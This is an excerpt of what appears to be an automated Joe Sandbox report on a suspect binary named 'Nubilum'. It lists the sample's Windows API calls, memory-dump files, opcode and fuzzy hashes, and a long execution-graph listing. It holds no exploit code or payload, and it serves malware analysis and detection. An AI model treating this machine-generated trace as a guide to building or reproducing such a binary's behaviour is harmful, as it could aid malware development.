                          • GetModuleHandleA.KERNEL32(1FABC7DD), ref: 1FABC7E6
                          • GetModuleHandleA.KERNEL32(?,1FABC7DD), ref: 1FABC838
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1FABC860
                            • Part of subcall function 1FABC803: GetProcAddress.KERNEL32(00000000,1FABC7F4), ref: 1FABC804
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID:
                          • API String ID: 1646373207-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 864379c1c8a8ea822459058d27d4ee847a32fed6b1390b8812c7d8959239598e
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: FF01F130945F5178EB1156F40C01EFA6F9C9A27660B102BAEE150CB193E9ACB506C3F6
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,1FAB1D66,00000000,00000000,?,1FAB5C88,1FAB1D66,00000000,00000000,00000000,?,1FAB5E85,00000006,FlsSetValue), ref: 1FAB5D13
                          • GetLastError.KERNEL32(?,1FAB5C88,1FAB1D66,00000000,00000000,00000000,?,1FAB5E85,00000006,FlsSetValue,1FABE190,FlsSetValue,00000000,00000364,?,1FAB5BC8), ref: 1FAB5D1F
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,1FAB5C88,1FAB1D66,00000000,00000000,00000000,?,1FAB5E85,00000006,FlsSetValue,1FABE190,FlsSetValue,00000000), ref: 1FAB5D2D
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: 3e67277bc443d8dd91ad2c8a893e7b5b38aac89969254c56f5f977312e9bc666
                          • Instruction ID: 24d40232f16a124ff823aa7dce1a0c72d53448acf8e566926ed5546ad8ac5d9d
                          • Opcode Fuzzy Hash: 3e67277bc443d8dd91ad2c8a893e7b5b38aac89969254c56f5f977312e9bc666
                          • Instruction Fuzzy Hash: 9D01F236605232AFC3118A7CDC8CA86379CAF85BB1B110728F94ADB144D72DE812CAE0
                          APIs
                          • _free.LIBCMT ref: 1FAB655C
                            • Part of subcall function 1FAB62BC: IsProcessorFeaturePresent.KERNEL32(00000017,1FAB62AB,00000000,?,?,?,?,00000016,?,?,1FAB62B8,00000000,00000000,00000000,00000000,00000000), ref: 1FAB62BE
                            • Part of subcall function 1FAB62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 1FAB62E0
                            • Part of subcall function 1FAB62BC: TerminateProcess.KERNEL32(00000000), ref: 1FAB62E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                          • String ID: *?$.
                          • API String ID: 2667617558-3972193922
                          • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                          • Instruction ID: bbc553403b85802e0f5fc8a5d9dedda39c178c2694fbdb8dd21dfd42c656c64c
                          • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                          • Instruction Fuzzy Hash: 015165B5E0421A9FDB14CFA8C980AADBBFDFF48314F1541ADD454E7344E67DAA018B50
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: : $Se.
                          • API String ID: 4218353326-4089948878
                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                          • Instruction ID: be64cce4880e218943ae7e03d90520822f85d970a1be37ffc84ae96f2df07671
                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                          • Instruction Fuzzy Hash: A2110A75904349AFDB11CFA8D840BDDFBFCEF09204F10405AE545E7212E6786B42CB65
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 1FAB2903
                            • Part of subcall function 1FAB35D2: RaiseException.KERNEL32(?,?,?,1FAB2925,00000000,00000000,00000000,?,?,?,?,?,1FAB2925,?,1FAC21B8), ref: 1FAB3632
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 1FAB2920
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.3696408167.000000001FAB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FAB0000, based on PE: true
                          • Associated: 00000010.00000002.3696389541.000000001FAB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000010.00000002.3696408167.000000001FAC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_1fab0000_Nubilum.jbxd
                          Similarity
                          • API ID: Exception@8Throw$ExceptionRaise
                          • String ID: Unknown exception
                          • API String ID: 3476068407-410509341
                          • Opcode ID: e964d34a20e7a2a7700348797f1141e2f2588cc2a5785cde1f2da1f6219d0cdc
                          • Instruction ID: 689be53b4a3dc6c02929e36c309a1acd979bea054d8fece7ab2b8e5595052f12
                          • Opcode Fuzzy Hash: e964d34a20e7a2a7700348797f1141e2f2588cc2a5785cde1f2da1f6219d0cdc
                          • Instruction Fuzzy Hash: 22F0A43890430DB78B05AAE5ED449DD77ECAE00650F50427EAD18D6090FB3DF955C5C0
                          APIs
                          • GetTickCount.KERNEL32 ref: 00405CE3
                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,007B3000,0040330F,007B5000,007B5800,007B5800,007B5800,007B5800,007B5800,007B5800,00403539), ref: 00405CFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.3667692918.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.3667545006.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3667820784.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3668783744.000000000040A000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3669913383.00000000007DD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000010.00000002.3669913383.000000000081D000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: nsa
                          • API String ID: 1716503409-2209301699
                          • Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                          • Instruction ID: aeb5d05e7b1985b111a0783ff917fd57ebf59e966c6a14e956644d39efae3932
                          • Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                          • Instruction Fuzzy Hash: ECF09076700608BFDB109F59ED09B9BB7BDEF91710F20803BF901E7180E6B49A548B68

                          Execution Graph

                          Execution Coverage:6.4%
                          Dynamic/Decrypted Code Coverage:9.2%
                          Signature Coverage:3.5%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:110
                          execution_graph 37629 44dea5 37630 44deb5 FreeLibrary 37629->37630 37631 44dec3 37629->37631 37630->37631 37632 4147f3 37635 414561 37632->37635 37634 414813 37636 41456d 37635->37636 37637 41457f GetPrivateProfileIntW 37635->37637 37640 4143f1 memset _itow WritePrivateProfileStringW 37636->37640 37637->37634 37639 41457a 37639->37634 37640->37639 37641 4287c1 37642 4287d2 37641->37642 37645 429ac1 37641->37645 37646 428818 37642->37646 37647 42881f 37642->37647 37656 425711 37642->37656 37643 4259da 37704 416760 11 API calls 37643->37704 37675 425ad6 37645->37675 37711 415c56 11 API calls 37645->37711 37678 42013a 37646->37678 37706 420244 97 API calls 37647->37706 37649 4260dd 37705 424251 120 API calls 37649->37705 37652 4259c2 37652->37675 37698 415c56 11 API calls 37652->37698 37656->37643 37656->37645 37656->37652 37659 429a4d 37656->37659 37662 422aeb memset memcpy memcpy 37656->37662 37666 4260a1 37656->37666 37674 425a38 37656->37674 37694 4227f0 memset memcpy 37656->37694 37695 422b84 15 API calls 37656->37695 37696 422b5d memset memcpy memcpy 37656->37696 37697 422640 13 API calls 37656->37697 37699 4241fc 11 API calls 37656->37699 37700 42413a 90 API calls 37656->37700 37660 429a66 37659->37660 37661 429a9b 37659->37661 37707 415c56 11 API calls 37660->37707 37665 429a96 37661->37665 37709 416760 11 API calls 37661->37709 37662->37656 37710 424251 120 API calls 37665->37710 37703 415c56 11 API calls 37666->37703 37668 429a7a 37708 416760 11 API calls 37668->37708 37674->37652 37701 422640 13 API calls 37674->37701 37702 4226e0 12 API calls 37674->37702 37679 42014c 37678->37679 37682 420151 37678->37682 37721 41e466 97 API calls 37679->37721 37681 420162 37681->37656 37682->37681 37683 4201b3 37682->37683 37684 420229 37682->37684 37685 4201b8 37683->37685 37686 4201dc 37683->37686 37684->37681 37687 41fd5e 86 API calls 37684->37687 37712 41fbdb 37685->37712 37686->37681 37690 4201ff 37686->37690 37718 41fc4c 37686->37718 37687->37681 37690->37681 37693 42013a 97 API calls 37690->37693 37693->37681 37694->37656 37695->37656 37696->37656 37697->37656 37698->37643 37699->37656 37700->37656 37701->37674 37702->37674 37703->37643 37704->37649 37705->37675 37706->37656 37707->37668 37708->37665 37709->37665 37710->37645 37711->37643 37713 41fbf8 37712->37713 37716 41fbf1 37712->37716 37726 41ee26 37713->37726 37717 41fc39 37716->37717 37736 4446ce 11 API calls 37716->37736 37717->37681 37722 41fd5e 37717->37722 37719 41ee6b 86 API calls 37718->37719 37720 41fc5d 37719->37720 37720->37686 37721->37682 37724 41fd65 37722->37724 37723 41fdab 37723->37681 37724->37723 37725 41fbdb 86 API calls 37724->37725 37725->37724 37727 41ee41 37726->37727 37728 41ee32 37726->37728 37737 41edad 37727->37737 37740 4446ce 11 API calls 37728->37740 37731 41ee3c 37731->37716 37734 41ee58 37734->37731 37742 41ee6b 37734->37742 37736->37717 37746 41be52 37737->37746 37740->37731 37741 41eb85 11 API calls 37741->37734 37743 41ee70 37742->37743 37744 41ee78 37742->37744 37802 41bf99 86 API calls 37743->37802 37744->37731 37747 41be5f 37746->37747 37749 41be6f 37746->37749 37781 4446ce 11 API calls 37747->37781 37753 41be8c 37749->37753 37767 418c63 37749->37767 37750 41be69 37750->37731 37750->37741 37753->37750 37754 41bf3a 37753->37754 37756 41bed1 37753->37756 37758 41bee7 37753->37758 37784 4446ce 11 API calls 37754->37784 37757 41bef0 37756->37757 37760 41bee2 37756->37760 37757->37758 37759 41bf01 37757->37759 37758->37750 37785 41a453 86 API calls 37758->37785 37761 41bf24 memset 37759->37761 37763 41bf14 37759->37763 37782 418a6d memset memcpy memset 37759->37782 37771 41ac13 37760->37771 37761->37750 37783 41a223 memset memcpy memset 37763->37783 37766 41bf20 37766->37761 37769 418c72 37767->37769 37768 418c94 37768->37753 37769->37768 37770 418d51 memset memset 37769->37770 37770->37768 37772 41ac52 37771->37772 37773 41ac3f memset 37771->37773 37775 41ac6a 37772->37775 37786 41dc14 19 API calls 37772->37786 37778 41acd9 37773->37778 37776 41aca1 37775->37776 37787 41519d 37775->37787 37776->37778 37779 41acc0 memset 37776->37779 37780 41accd memcpy 37776->37780 37778->37758 37779->37778 37780->37778 37781->37750 37782->37763 37783->37766 37784->37758 37786->37775 37790 4175ed 37787->37790 37798 417570 SetFilePointer 37790->37798 37793 41760a ReadFile 37794 417637 37793->37794 37795 417627 GetLastError 37793->37795 37796 4151b3 37794->37796 37797 41763e memset 37794->37797 37795->37796 37796->37776 37797->37796 37799 41759c GetLastError 37798->37799 37801 4175b2 37798->37801 37800 4175a8 GetLastError 37799->37800 37799->37801 37800->37801 37801->37793 37801->37796 37802->37744 37803 417bc5 37804 417c61 37803->37804 37805 417bda 37803->37805 37805->37804 37806 417bf6 UnmapViewOfFile CloseHandle 37805->37806 37809 417c2c 37805->37809 37810 4175b7 37805->37810 37806->37805 37806->37806 37809->37805 37815 41851e 20 API calls 37809->37815 37811 4175d6 FindCloseChangeNotification 37810->37811 37812 4175c8 37811->37812 37813 4175df 37811->37813 37812->37813 37814 4175ce Sleep 37812->37814 37813->37805 37814->37811 37815->37809 37816 4152c7 malloc 37817 4152ef 37816->37817 37819 4152e2 37816->37819 37820 416760 11 API calls 37817->37820 37820->37819 37821 4148b6 FindResourceW 37822 4148cf SizeofResource 37821->37822 37825 4148f9 37821->37825 37823 4148e0 LoadResource 37822->37823 37822->37825 37824 4148ee LockResource 37823->37824 37823->37825 37824->37825 37826 415308 ??3@YAXPAX 37827 441b3f 37837 43a9f6 37827->37837 37829 441b61 38010 4386af memset 37829->38010 37831 44189a 37832 442bd4 37831->37832 37833 4418e2 37831->37833 37834 4418ea 37832->37834 38012 441409 memset 37832->38012 37833->37834 38011 4414a9 12 API calls 37833->38011 37838 43aa20 37837->37838 37839 43aadf 37837->37839 37838->37839 37840 43aa34 memset 37838->37840 37839->37829 37841 43aa56 37840->37841 37842 43aa4d 37840->37842 38013 43a6e7 37841->38013 38164 42c02e memset 37842->38164 37847 43aad3 38165 4169a7 11 API calls 37847->38165 37850 43ac18 37852 43ac47 37850->37852 38167 42bbd5 memcpy memcpy memcpy memset memcpy 37850->38167 37853 43aca8 37852->37853 38168 438eed 16 API calls 37852->38168 37857 43acd5 37853->37857 38170 4233ae 11 API calls 37853->38170 37856 43ac87 38169 4233c5 16 API calls 37856->38169 38025 423426 37857->38025 37861 43ace1 38029 439811 37861->38029 37862 43a9f6 161 API calls 37863 43aae5 37862->37863 37863->37839 37863->37850 37863->37862 38166 439bbb 22 API calls 37863->38166 37865 43acfd 37871 43ad2c 37865->37871 38171 438eed 16 API calls 37865->38171 37867 43ad19 38172 4233c5 16 API calls 37867->38172 37869 43ad58 38058 44081d 37869->38058 37871->37869 37873 43add9 37871->37873 37872 423426 11 API calls 37874 43ae3a memset 37872->37874 37873->37872 37873->37873 37875 43ae73 37874->37875 38174 42e1c0 147 API calls 37875->38174 37876 43adab 38097 438c4e 37876->38097 37878 43ad6c 37878->37839 37878->37876 38173 42370b memset memcpy memset 37878->38173 37880 43ae96 38175 42e1c0 147 API calls 37880->38175 37885 43aea8 37886 43aec1 37885->37886 38176 42e199 147 API calls 37885->38176 37888 43af00 37886->37888 38177 42e1c0 147 API calls 37886->38177 37888->37839 37891 43af1a 37888->37891 37892 43b3d9 37888->37892 38178 438eed 16 API calls 37891->38178 37897 43b3f6 37892->37897 37904 43b4c8 37892->37904 37894 43b60f 37894->37839 38154 4393a5 37894->38154 37895 43af2f 38179 4233c5 16 API calls 37895->38179 38213 432878 12 API calls 37897->38213 37899 43af51 37900 423426 11 API calls 37899->37900 37902 43af7d 37900->37902 37906 423426 11 API calls 37902->37906 37903 43b4f2 38220 43a76c 21 API calls 37903->38220 37904->37903 38219 42bbd5 memcpy memcpy memcpy memset memcpy 37904->38219 37909 43af94 37906->37909 37908 43b529 37911 44081d 161 API calls 37908->37911 38180 423330 11 API calls 37909->38180 37914 43b544 37911->37914 37913 43b47e 37917 43b497 37913->37917 38216 42374a memcpy memset memcpy memcpy memcpy 37913->38216 37918 43b55c 37914->37918 38221 42c02e memset 37914->38221 37915 43b428 37937 43b462 37915->37937 38214 432b60 16 API calls 37915->38214 37916 43afca 38181 423330 11 API calls 37916->38181 38217 4233ae 11 API calls 37917->38217 38222 43a87a 163 API calls 37918->38222 37923 43afdb 38182 4233ae 11 API calls 37923->38182 37925 43b4b1 38218 423399 11 API calls 37925->38218 37927 43b56c 37930 43b58a 37927->37930 38223 423330 11 API calls 37927->38223 37929 43afee 37934 44081d 161 API calls 37929->37934 37931 440f84 12 API calls 37930->37931 37936 43b592 37931->37936 37932 43b4c1 38225 42db80 163 API calls 37932->38225 37944 43b005 37934->37944 38224 43a82f 16 API calls 37936->38224 38215 423330 11 API calls 37937->38215 37940 43b5b4 37941 438c4e 161 API calls 37940->37941 37942 43b5cf 37941->37942 38226 42c02e memset 37942->38226 37944->37839 37949 43b01f 37944->37949 38183 42d836 163 API calls 37944->38183 37945 43b1ef 38192 4233c5 16 API calls 37945->38192 37947 43b212 38193 423330 11 API calls 37947->38193 37949->37945 38190 423330 11 API calls 37949->38190 38191 42d71d 163 API calls 37949->38191 37951 43add4 37951->37894 38227 438f86 16 API calls 37951->38227 37954 43b087 38184 4233ae 11 API calls 37954->38184 37955 43b22a 38194 42ccb5 11 API calls 37955->38194 37958 43b10f 38187 423330 11 API calls 37958->38187 37959 43b23f 38195 4233ae 11 API calls 37959->38195 37961 43b257 38196 4233ae 11 API calls 37961->38196 37965 43b129 38188 4233ae 11 API calls 37965->38188 37966 43b26e 38197 4233ae 11 API calls 37966->38197 37968 43b09a 37968->37958 38185 42cc15 19 API calls 37968->38185 38186 4233ae 11 API calls 37968->38186 37970 43b282 38198 43a87a 163 API calls 37970->38198 37972 43b13c 37975 440f84 12 API calls 37972->37975 37974 43b29d 38199 423330 11 API calls 37974->38199 37977 43b15f 37975->37977 38189 4233ae 11 API calls 37977->38189 37978 43b2af 37980 43b2b8 37978->37980 37981 43b2ce 37978->37981 38200 4233ae 11 API calls 37980->38200 37983 440f84 12 API calls 37981->37983 37985 43b2da 37983->37985 37984 43b2c9 38202 4233ae 11 API calls 37984->38202 38201 42370b memset memcpy memset 37985->38201 37988 43b2f9 38203 423330 11 API calls 37988->38203 37990 43b30b 38204 423330 11 API calls 37990->38204 37992 43b325 38205 423399 11 API calls 37992->38205 37994 43b332 38206 4233ae 11 API calls 37994->38206 37996 43b354 38207 423399 11 API calls 37996->38207 37998 43b364 38208 43a82f 16 API calls 37998->38208 38000 43b370 38209 42db80 163 API calls 38000->38209 38002 43b380 38003 438c4e 161 API calls 38002->38003 38004 43b39e 38003->38004 38210 423399 11 API calls 38004->38210 38006 43b3ae 38211 43a76c 21 API calls 38006->38211 38008 43b3c3 38212 423399 11 API calls 38008->38212 38010->37831 38011->37834 38012->37832 38014 43a6f5 38013->38014 38015 43a765 38013->38015 38014->38015 38228 42a115 38014->38228 38015->37839 38021 4397fd 38015->38021 38019 43a73d 38019->38015 38020 42a115 147 API calls 38019->38020 38020->38015 38022 43980c 38021->38022 38023 439804 38021->38023 38022->37839 38022->37847 38022->37863 38513 42324c memset 38023->38513 38026 42343a 38025->38026 38028 42344c 38025->38028 38514 415bbe 11 API calls 38026->38514 38028->37861 38030 439828 38029->38030 38057 439952 38029->38057 38031 4397fd memset 38030->38031 38030->38057 38032 43984c 38031->38032 38033 4398b0 38032->38033 38034 43986b 38032->38034 38032->38057 38517 42d71d 163 API calls 38033->38517 38515 4233ae 11 API calls 38034->38515 38037 4398bd 38518 423399 11 API calls 38037->38518 38038 43987a 38040 439892 38038->38040 38516 423330 11 API calls 38038->38516 38040->38057 38520 42d71d 163 API calls 38040->38520 38041 4398c8 38519 4233ae 11 API calls 38041->38519 38045 4398f5 38521 423399 11 API calls 38045->38521 38047 439902 38522 423399 11 API calls 38047->38522 38049 43990c 38523 423330 11 API calls 38049->38523 38051 43991c 38524 423330 11 API calls 38051->38524 38053 439936 38525 423399 11 API calls 38053->38525 38055 439942 38526 423330 11 API calls 38055->38526 38057->37865 38059 440850 38058->38059 38060 44083e 38058->38060 38062 415a91 memset 38059->38062 38527 4169a7 11 API calls 38060->38527 38063 44087b 38062->38063 38064 44084a 38063->38064 38065 423426 11 API calls 38063->38065 38064->37878 38066 4408a6 memset 38065->38066 38067 44092e 38066->38067 38068 44090c 38066->38068 38529 43e10c memset memcpy 38067->38529 38068->38067 38528 42a003 147 API calls 38068->38528 38071 44093b 38072 440955 38071->38072 38075 440968 38071->38075 38530 42c0c8 147 API calls 38071->38530 38072->38075 38531 42db80 163 API calls 38072->38531 38087 4409d1 38075->38087 38532 43e696 163 API calls 38075->38532 38077 440a01 memset 38077->38087 38079 440d1b 38086 440e28 38079->38086 38535 432878 12 API calls 38079->38535 38081 440f3a 38082 440f50 38081->38082 38081->38086 38082->38064 38546 43fe30 163 API calls 38082->38546 38083 440e1c 38536 4169a7 11 API calls 38083->38536 38537 440799 38086->38537 38087->38077 38087->38079 38087->38083 38087->38086 38533 43f37c 14 API calls 38087->38533 38534 43f524 18 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38087->38534 38093 440d6a 38093->38081 38095 4233c5 16 API calls 38093->38095 38541 435f88 17 API calls 38093->38541 38542 42374a memcpy memset memcpy memcpy memcpy 38093->38542 38543 43ee22 23 API calls 38093->38543 38544 432b60 16 API calls 38093->38544 38545 432878 12 API calls 38093->38545 38095->38093 38098 438ee5 38097->38098 38099 438c78 38097->38099 38144 440f84 38098->38144 38102 438c97 38099->38102 38548 438bb0 11 API calls 38099->38548 38101 438cdb 38103 438d0c 38101->38103 38550 438bfd 16 API calls 38101->38550 38102->38101 38549 42d836 163 API calls 38102->38549 38104 438eb1 38103->38104 38105 438d1f 38103->38105 38563 423330 11 API calls 38104->38563 38109 438d41 38105->38109 38111 438e6a 38105->38111 38112 438d2d 38105->38112 38113 438e80 38109->38113 38114 438d54 38109->38114 38127 438d77 38109->38127 38118 438e70 38111->38118 38119 438e18 38111->38119 38116 438d36 38112->38116 38117 438dfa 38112->38117 38120 438e96 38113->38120 38121 438e88 38113->38121 38551 423330 11 API calls 38114->38551 38116->38109 38116->38127 38128 438d7c 38116->38128 38117->38119 38131 438e2a 38117->38131 38560 42ccb5 11 API calls 38118->38560 38557 438aa3 163 API calls 38119->38557 38562 4233ae 11 API calls 38120->38562 38561 423399 11 API calls 38121->38561 38127->38098 38564 423330 11 API calls 38127->38564 38553 423330 11 API calls 38128->38553 38129 438d6a 38552 438aa3 163 API calls 38129->38552 38558 4233c5 16 API calls 38131->38558 38135 438d92 38137 438d9b 38135->38137 38138 438dad 38135->38138 38136 438e44 38559 4233ae 11 API calls 38136->38559 38554 438aa3 163 API calls 38137->38554 38555 4233ae 11 API calls 38138->38555 38142 438dc4 38556 423330 11 API calls 38142->38556 38145 440fa7 38144->38145 38149 423399 11 API calls 38145->38149 38151 4233ae 11 API calls 38145->38151 38152 441105 38145->38152 38565 423330 11 API calls 38145->38565 38146 441223 38147 440799 memset 38146->38147 38148 441242 38147->38148 38148->37951 38149->38145 38150 423399 11 API calls 38150->38152 38151->38145 38152->38146 38152->38150 38155 4393c7 38154->38155 38156 4394db 38154->38156 38155->38156 38566 423c8d 38155->38566 38156->37839 38158 4394d0 38573 439351 15 API calls 38158->38573 38162 4393fd 38162->38158 38163 4165ff 11 API calls 38162->38163 38571 415be9 memcpy 38162->38571 38572 423ce4 15 API calls 38162->38572 38163->38162 38164->37841 38165->37839 38166->37863 38167->37852 38168->37856 38169->37853 38170->37857 38171->37867 38172->37871 38173->37876 38174->37880 38175->37885 38176->37886 38177->37886 38178->37895 38179->37899 38180->37916 38181->37923 38182->37929 38183->37954 38184->37968 38185->37968 38186->37968 38187->37965 38188->37972 38189->37949 38190->37949 38191->37949 38192->37947 38193->37955 38194->37959 38195->37961 38196->37966 38197->37970 38198->37974 38199->37978 38200->37984 38201->37984 38202->37988 38203->37990 38204->37992 38205->37994 38206->37996 38207->37998 38208->38000 38209->38002 38210->38006 38211->38008 38212->37951 38213->37915 38214->37937 38215->37913 38216->37917 38217->37925 38218->37932 38219->37903 38220->37908 38221->37918 38222->37927 38223->37930 38224->37932 38225->37940 38226->37951 38227->37894 38229 42a175 38228->38229 38231 42a122 38228->38231 38229->38015 38234 42b13b 147 API calls 38229->38234 38231->38229 38232 42a115 147 API calls 38231->38232 38235 43a174 38231->38235 38259 42a0a8 147 API calls 38231->38259 38232->38231 38234->38019 38249 43a196 38235->38249 38250 43a19e 38235->38250 38236 43a306 38236->38249 38279 4388c4 14 API calls 38236->38279 38239 42a115 147 API calls 38239->38250 38241 43a642 38241->38249 38283 4169a7 11 API calls 38241->38283 38245 43a635 38282 42c02e memset 38245->38282 38249->38231 38250->38236 38250->38239 38250->38249 38260 42ff8c 38250->38260 38268 415a91 38250->38268 38272 4165ff 38250->38272 38275 439504 13 API calls 38250->38275 38276 4312d0 147 API calls 38250->38276 38277 42be4c memcpy memcpy memcpy memset memcpy 38250->38277 38278 43a121 11 API calls 38250->38278 38252 4169a7 11 API calls 38253 43a325 38252->38253 38253->38241 38253->38245 38253->38249 38253->38252 38254 42b5b5 memset memcpy 38253->38254 38255 42bf4c 14 API calls 38253->38255 38258 4165ff 11 API calls 38253->38258 38280 42b63e 14 API calls 38253->38280 38281 42bfcf memcpy 38253->38281 38254->38253 38255->38253 38258->38253 38259->38231 38284 43817e 38260->38284 38262 42ff99 38263 42ffe3 38262->38263 38264 42ffd0 38262->38264 38267 42ff9d 38262->38267 38289 4169a7 11 API calls 38263->38289 38288 4169a7 11 API calls 38264->38288 38267->38250 38269 415a9d 38268->38269 38270 415ab3 38269->38270 38271 415aa4 memset 38269->38271 38270->38250 38271->38270 38492 4165a0 38272->38492 38275->38250 38276->38250 38277->38250 38278->38250 38279->38253 38280->38253 38281->38253 38282->38241 38283->38249 38285 438187 38284->38285 38287 438192 38284->38287 38290 4380f6 38285->38290 38287->38262 38288->38267 38289->38267 38292 43811f 38290->38292 38291 438164 38291->38287 38292->38291 38295 437e5e 38292->38295 38318 4300e8 memset memset memcpy 38292->38318 38319 437d3c 38295->38319 38297 437eb3 38297->38292 38298 437ea9 38298->38297 38304 437f22 38298->38304 38334 41f432 38298->38334 38301 437f06 38381 415c56 11 API calls 38301->38381 38303 437f95 38386 415c56 11 API calls 38303->38386 38305 437f7f 38304->38305 38382 432d4e 38304->38382 38305->38303 38308 43802b 38305->38308 38309 4165ff 11 API calls 38308->38309 38310 438054 38309->38310 38345 437371 38310->38345 38313 43806b 38314 438094 38313->38314 38387 42f50e 138 API calls 38313->38387 38316 437fa3 38314->38316 38388 4300e8 memset memset memcpy 38314->38388 38316->38297 38389 41f638 104 API calls 38316->38389 38318->38292 38320 437d69 38319->38320 38323 437d80 38319->38323 38402 437ccb 11 API calls 38320->38402 38322 437d76 38322->38298 38323->38322 38324 437da3 38323->38324 38326 437d90 38323->38326 38390 438460 38324->38390 38326->38322 38406 437ccb 11 API calls 38326->38406 38329 437de8 38405 424f26 123 API calls 38329->38405 38330 437dcb 38330->38329 38403 444283 13 API calls 38330->38403 38332 437dfc 38404 437ccb 11 API calls 38332->38404 38335 41f54d 38334->38335 38341 41f44f 38334->38341 38336 41f466 38335->38336 38436 41c635 memset memset 38335->38436 38336->38301 38336->38304 38341->38336 38343 41f50b 38341->38343 38407 41f1a5 38341->38407 38432 41c06f memcmp 38341->38432 38433 41f3b1 90 API calls 38341->38433 38434 41f398 86 API calls 38341->38434 38343->38335 38343->38336 38435 41c295 86 API calls 38343->38435 38437 41703f 38345->38437 38347 437399 38348 43739d 38347->38348 38351 4373ac 38347->38351 38470 4446ea 11 API calls 38348->38470 38350 4373a7 38350->38313 38444 416935 38351->38444 38353 4373ca 38354 438460 134 API calls 38353->38354 38363 415a91 memset 38353->38363 38366 43758f 38353->38366 38378 437584 38353->38378 38380 437d3c 135 API calls 38353->38380 38452 4251c4 38353->38452 38471 425433 13 API calls 38353->38471 38472 425413 17 API calls 38353->38472 38473 42533e 16 API calls 38353->38473 38474 42538f 16 API calls 38353->38474 38475 42453e 123 API calls 38353->38475 38354->38353 38355 4375bc 38478 415c7d 38355->38478 38361 4375e2 38361->38350 38489 444283 13 API calls 38361->38489 38363->38353 38476 42453e 123 API calls 38366->38476 38369 4375f4 38372 437620 38369->38372 38373 43760b 38369->38373 38371 43759f 38374 416935 16 API calls 38371->38374 38376 416935 16 API calls 38372->38376 38490 444283 13 API calls 38373->38490 38374->38378 38376->38350 38378->38355 38477 42453e 123 API calls 38378->38477 38379 437612 memcpy 38379->38350 38380->38353 38381->38297 38383 432d58 38382->38383 38385 432d65 38382->38385 38491 432cc4 memset memset memcpy 38383->38491 38385->38305 38386->38316 38387->38314 